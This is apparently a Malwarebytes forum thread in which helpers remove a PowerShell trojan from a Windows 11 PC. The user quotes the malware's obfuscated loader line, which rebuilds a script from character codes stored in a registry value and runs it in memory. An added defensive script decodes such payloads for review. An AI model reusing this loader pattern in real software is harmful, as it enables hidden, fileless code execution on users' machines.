ramiwi Posted October 29, 2023 ID:1597236

Avira security on Windows 11 keeps alerting this every few seconds (started today). How can I find out what's causing this? This is the message:

    Suspicious behavior blocked
    Item name: memorybuffer.f00df41003e9a3b48...
    Threat name: TR/PShell.Agent.VPO
    Type: Trojan
    Status: Blocked
    A running process on your device is potentially malicious and has been blocked.
Porthos Posted October 29, 2023 ID:1597242

@ramiwi Let's get the info to get the process started. Please do the following so that we may take a closer look at your system for any possible infections.

Do these 2 steps so that ALL folders & files are set to SHOW, plus also turn OFF Windows Fast Start:

Show-Hidden-Folders-Files-Extensions
https://forums.malwarebytes.com/topic/299345-show-hidden-folders-files-extensions/

Disable-Fast-Startup
https://forums.malwarebytes.com/topic/299350-disable-fast-startup/

Then please restart the computer and do the following.

WARNING: Do not click the Repair option under Advanced unless requested by a Malwarebytes support agent or authorized helper.

NOTE: The tools and the information obtained are safe and not harmful to your privacy or your computer; please allow the programs to run if blocked by your system.

1. Download the Malwarebytes Support Tool.
2. In your Downloads folder, open the mb-support-x.x.x.xxx.exe file.
3. In the User Account Control pop-up window, click Yes to continue the installation.
4. Run the MBST Support Tool.
5. In the left navigation pane of the Malwarebytes Support Tool, click Advanced.
6. In the Advanced Options, click Gather Logs. A status diagram displays the tool is Getting logs from your machine.
7. A zip file named mbst-grab-results.zip will be saved to the Desktop or on the hidden Public desktop (usually C:\Users\Public\Desktop); please upload that file on your next reply.

Thank you
ramiwi (Author) Posted October 30, 2023 ID:1597315

@Porthos Thanks! My results are attached. I ran the diag tool right after booting up (I didn't have the fast startup checkbox in the unavailable settings; maybe I disabled it in my BIOS in the past). The alerts only started about an hour after booting, and then kept popping up every few seconds. So it was quiet while the tool was working. I can send another report when they start to pop up again.

The previous reply (from Said) is not related to me.

Attachment: mbst-grab-results.zip
AdvancedSetup (Root Admin) Posted October 30, 2023 ID:1597348

Hello @ramiwi. Did you create this PowerShell script to run with a scheduled task on your own?

C:\WINDOWS\System32\375263BC-272F-4C89-877F-092DB6A60857.ps1
ramiwi (Author) Posted October 30, 2023 ID:1597350

No, I haven't.
AdvancedSetup (Root Admin) Posted October 30, 2023 ID:1597359

Give me a moment to write up a fix for you @ramiwi. In the meantime, please do the following:

[ 1 ] ATTENTION: System Restore is disabled (Total: 300 GB) (Free: 28.8 GB) (10%). Please enable and create a new System Restore Point.

Turn On or Off System Protection for Drives in Windows 11
https://www.elevenforum.com/t/turn-on-or-off-system-protection-for-drives-in-windows-11.3598/

Create System Restore Point in Windows 11
https://www.elevenforum.com/t/create-system-restore-point-in-windows-11.3602/

[ 2 ] Please go to Control Panel, Programs, Programs and Features, Uninstall a program. Then right-click and uninstall the following:

Java 8 Update 241

[ 3 ] Please see the following for reference only:

Class-action lawsuit against antivirus firm for selling data
AdvancedSetup (Root Admin) Posted October 30, 2023 ID:1597366 [Solution]

Please run the following fix. Make sure you temporarily disable the Avira antivirus real-time protection first.

NOTE: Please read all of the information below before running this fix.

NOTICE: This script was written specifically for this user, for use on this particular machine. Running this on another machine may cause damage to your operating system that cannot be undone.

Once the fix has been completed, please attach the file FIXLOG.TXT to your next reply.

Farbar program: FRSTEnglish.exe
Save the attached file FIXLIST.TXT to this folder: C:\Users\rami_\Downloads\

NOTE: It's important that both files, FRSTEnglish.exe and fixlist.txt, are in the same location or the fix will not work.

Please make sure you disable any real-time antivirus or security software before running this script. Once completed, make sure you re-enable it.

Run the Farbar program with Admin rights and press the Fix button just once and wait. The fix may possibly take up to 60 minutes to complete. If the tool needs a restart, please make sure you let the system restart normally and let the tool complete its run after restart. The tool will make a log named Fixlog.txt in the same folder you ran the Farbar program from. Please attach that log on your next reply.

NOTE: This fix will run a scan to check that all Microsoft operating system files are valid and not corrupt and attempt to correct any invalid files. It will also run a disk check on the restart to ensure disk integrity.

NOTE: As part of this fix all temporary files will be removed. If you have any open web pages that have not been bookmarked, please make sure you bookmark them now, as all open applications may be automatically closed. Also, make sure you know the passwords for all websites, as cookies may possibly be removed in some cases, but not all cases.

NOTE: As part of this fix, it will also reset the network to default settings, including the firewall. If you have custom firewall rules you need to save, please export or save them first before running this fix.

The following directories are emptied:
- Windows Temp
- Users Temp folders
- Edge, IE, FF, Chrome, and Opera caches, HTML5 storages, Cookies and History
- Recently opened files cache
- Discord cache
- Java cache
- Steam HTML cache
- Explorer thumbnail and icon cache
- BITS transfer queue (qmgr*.dat files)
- Recycle Bin

Important: items are permanently deleted. They are not moved to quarantine.

If you have any questions or concerns, please ask before running this fix. The system will be rebooted after the fix has run.

Attachment: fixlist.txt

Thanks
ramiwi (Author) Posted October 30, 2023 ID:1597410

Sorry, I don't see the Farbar attachment.
ramiwi (Author) Posted October 30, 2023 ID:1597411

Never mind, found it. Will run and update you.
ramiwi (Author) Posted October 30, 2023 ID:1597426

This is the result log.

Attachment: Fixlog.txt
ramiwi (Author) Posted October 30, 2023 ID:1597449

Many thanks! So far the alert seems to be gone. That PowerShell script appears to be suspicious:

C:\WINDOWS\System32\375263BC-272F-4C89-877F-092DB6A60857.ps1

    # Random-looking variables hold .NET type accelerators ([ScriptBlock], [string], [char])
    # so the conversions below are harder to spot; the [char] alias is never actually used.
    $LFSXIEJqQd=[ScriptBlock];$lhcOGyDfZLnqCQ=[string];$CJbdVcGDfEVbV=[char];
    # gp = Get-ItemProperty: read a value stored under a fake 7-Zip registry key, turn each
    # stored number back into a character, join them into script text, build a ScriptBlock
    # from it and run it with icm (Invoke-Command). The real payload lives in the registry,
    # not in this file, which is why only an in-memory buffer was flagged.
    icm ($LFSXIEJqQd::Create($lhcOGyDfZLnqCQ::Join('', ((gp 'HKLM:\SOFTWARE\7-ZipAA8xK7ht').'SLrPhfxtl3w' | % { [char]$_ }))))
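The loader AdvancedSetup flagged and ramiwi quoted above has a common shape: a scheduled task runs a small .ps1 in System32 that reads character codes from a registry value, joins them into script text and executes it, so the file on disk looks harmless and the real payload only exists in the registry and in memory. As an added triage example, which is not part of the thread and not a Malwarebytes or FRST tool, the PowerShell below lists scheduled tasks that launch a script file and, for a script of that shape, decodes the registry-stored payload so it can be read without being run. Function names, the regular expressions and the output file name are assumptions; run it in an elevated session on the suspect machine.

```powershell
# Added triage helper (not from the thread, not a Malwarebytes/FRST tool).
# Finds scheduled tasks that launch a .ps1 and decodes a registry-backed
# loader's payload for reading. Nothing that is found gets executed.
# Function names, patterns and the output file name are hypothetical.

function Find-ScriptTasks {
    # Scheduled tasks whose action runs powershell/pwsh with a .ps1 file
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            $cmd = "$($action.Execute) $($action.Arguments)"
            if ($cmd -match '(?i)(powershell|pwsh)' -and $cmd -match '(?i)\.ps1') {
                [pscustomobject]@{
                    TaskName = $task.TaskName
                    TaskPath = $task.TaskPath
                    Author   = $task.Author
                    RunAs    = $task.Principal.UserId
                    Command  = $cmd.Trim()
                }
            }
        }
    }
}

function Get-LoaderPayload {
    # Given a loader script on disk, locate the (gp 'HKLM:\...').'Value' read
    # it performs and return the stored numbers decoded to text, plus the file hash
    param([Parameter(Mandatory)][string]$ScriptPath)

    $text = Get-Content -Raw -LiteralPath $ScriptPath
    $m = [regex]::Match($text, "gp\s+'([^']+)'\)\.'([^']+)'")
    if (-not $m.Success) {
        Write-Warning "$ScriptPath does not match the registry-loader pattern"
        return $null
    }
    $key  = $m.Groups[1].Value
    $name = $m.Groups[2].Value
    # The loader stores the script as numbers and does [char]$_ on each; do the same,
    # but only to produce text for review
    $codes   = (Get-ItemProperty -LiteralPath $key -ErrorAction Stop).$name
    $decoded = -join ($codes | ForEach-Object { [char]$_ })

    [pscustomobject]@{
        ScriptPath    = $ScriptPath
        ScriptSHA256  = (Get-FileHash -LiteralPath $ScriptPath -Algorithm SHA256).Hash
        RegistryKey   = $key
        ValueName     = $name
        PayloadLength = $decoded.Length
        Payload       = $decoded   # read this; never pass it to Invoke-Command
    }
}

# Usage: list suspicious tasks, then decode any .ps1 they point at
$hits = Find-ScriptTasks
$hits | Format-Table -AutoSize

foreach ($hit in $hits) {
    $path = [regex]::Match($hit.Command, '(?i)[A-Z]:\\[^"]+?\.ps1').Value
    if ($path -and (Test-Path -LiteralPath $path)) {
        $result = Get-LoaderPayload -ScriptPath $path
        if ($result) {
            $result | Select-Object ScriptPath, ScriptSHA256, RegistryKey, ValueName, PayloadLength
            # Keep the decoded text for offline review (hypothetical file name)
            $result.Payload | Set-Content -LiteralPath "$env:USERPROFILE\Desktop\decoded-payload.txt"
        }
    }
}
```

The two things worth recording from its output are the script hash, which can be checked against VirusTotal the same way the helper tools in this thread are, and the registry key and value name, since a cleanup that deletes only the .ps1 and the task leaves the payload in place for any other trigger that may still reference it.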
AdvancedSetup (Root Admin) Posted October 30, 2023 ID:1597461

Thank you for the log. It ran pretty well and also found and fixed other issues. Windows Resource Protection found corrupt files and successfully repaired them.

SecurityCheck by glax24

I would like you to run a tool named SecurityCheck to inquire about the current security update status of some applications. CheckSecurity is a utility for quickly checking for the presence of vulnerable applications.

1. Temporarily disable Microsoft SmartScreen to download the software.
2. Download SecurityCheck by glax24: https://tools.safezone.cc/glax24/SecurityCheck/SecurityCheck.exe
3. If SmartScreen blocks the file from running, click on More info and Run anyway. This tool is safe. SmartScreen is overly sensitive. You can check the VirusTotal scan of the tool from here.
4. Right-click with your mouse on the SecurityCheck.exe and select "Run as administrator" and reply YES to allow it to run and go forward.
5. Wait for the scan to finish. It will open a text file named SecurityCheck.txt.
6. Close the file. Attach it with your next reply. You can find this file in a folder called SecurityCheck: C:\SecurityCheck\SecurityCheck.txt

Checked parameters:
- User Account Control (UAC).
- Service pack.
- IE version.
- Automatic OS update.
- Sets of critical KB patches when updating is disabled.
- Antivirus, firewall, other security utilities.
- Versions of Java, Oracle VirtualBox.
- Version of Adobe Flash Player, Adobe AIR.
- Versions of Adobe Reader, Acrobat Reader DC, Foxit Reader.
- Versions of media players (iTunes, AIMP, foobar2000).
- Versions of messengers (Skype, Pidgin).
- Versions of installed browsers (Chrome, Opera, Firefox, Yandex, SeaMonkey).
- Versions of mail programs (The Bat, Thunderbird).
- Checking running processes and security program services.
- Searching for installed Adware programs and optimizer programs (more than 5000).

Thank you
ramiwi (Author) Posted October 31, 2023 ID:1597564

Hi, the results are attached.

Attachment: SecurityCheck.txt
AdvancedSetup (Root Admin) Posted October 31, 2023 ID:1597619

Please make a new System Restore Point first. Then uninstall, update, or otherwise address the following as appropriate for your computer.

    7-Zip 22.00 (x64) v.22.00 Warning! Download Update | Uninstall old version and install new one.
    Adobe Creative Cloud v.3.9.0.327 Warning! Download Update
    Audacity 3.0.2 v.3.0.2 Warning! Download Update
    calibre 64bit v.6.9.0 Warning! Download Update
    FileZilla 3.62.2 v.3.62.2 Warning! Download Update
    foobar2000 v1.6.16 v.1.6.16 Warning! Download Update
    GIMP 2.10.14 v.2.10.14 Warning! Download Update
    IrfanView 4.53 (64-bit) v.4.53 Warning! Download Update
    Microsoft Visual Studio Code (User) v.1.82.2 Warning! Download Update
    Mozilla Thunderbird 78.7.1 (x86 en-US) v.78.7.1 Warning! Download Update
    Node.js v.18.12.1 Warning! Download Update
    Oracle VM VirtualBox 6.1.38 v.6.1.38 Warning! Download Update
    PuTTY release 0.76 (64-bit) v.0.76.0.0 Warning! Download Update
    Python 2.7.15 (64-bit) v.2.7.15150 Warning! Download Update
    Python 3.11.3 (64-bit) v.3.11.3150.0 Warning! Download Update
    Python 3.8.1 (32-bit) v.3.8.1150.0 Warning! Download Update
    Python 3.8.5 (64-bit) v.3.8.5150.0 Warning! Download Update
    qBittorrent v.4.5.4 Warning! Download Update
    Signal 5.29.1 v.5.29.1 Warning! Download Update
    TeamViewer v.15.40.8 Warning! Download Update
    WinRAR 5.71 (64-bit) v.5.71.0 Warning! Download Update

Please see the following for reference:
https://forums.malwarebytes.com/topic/303753-class-action-lawsuit-against-antivirus-firm-for-selling-data/

    ---------------------------- [ UnwantedApps ] -----------------------------
    Avira System Speedup v.6.26.0.18 << Hidden Warning! Suspected demo version of anti-spyware, driver updater or optimizer.

Then RESTART the computer and check for Windows Updates and install any found.

Let me know if there are still any signs of infection or other issues after these updates.

Thank you
AdvancedSetup (Root Admin) Posted November 16, 2023 ID:1600258

Due to the lack of feedback, this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request. This applies only to the originator of this topic. Other members who need assistance please start your own topic in a new thread.

Tips to help protect from infection

Thanks